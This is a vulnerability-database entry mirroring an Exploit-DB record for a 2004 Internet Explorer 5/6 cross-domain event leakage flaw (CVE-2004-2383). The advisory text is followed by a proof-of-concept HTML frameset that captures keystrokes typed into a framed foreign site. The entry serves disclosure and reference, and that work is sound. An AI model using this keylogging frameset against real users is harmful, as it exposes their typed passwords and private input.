Lucene search
+L

Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage

🗓️ 27 Feb 2004 00:00:00Reported by iDefenseType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 20 Views

Cross-domain leakage in Microsoft Internet Explorer may expose sensitive keystrokes to attackers.

Related
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Internet Explorer Cross Frame Scripting Restriction Bypass (CVE-2004-2383)
9 Feb 201000:00
checkpoint_advisories
CVE
CVE-2004-2383
16 Aug 200504:00
cve
Cvelist
CVE-2004-2383
16 Aug 200504:00
cvelist
NVD
CVE-2004-2383
31 Dec 200405:00
nvd
source: https://www.securityfocus.com/bid/9761/info

Microsoft Internet Explorer is reported to be prone to an issue that may leak sensitive information across foreign domains.

This issue could permit framesets in different domains to leak various events, including keyboard events. This could effectively permit a hostile web page to capture keystrokes from a foreign domain.

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.example.com" scrolling="auto">
</frameset>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Dec 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25.1
EPSS0.19967
20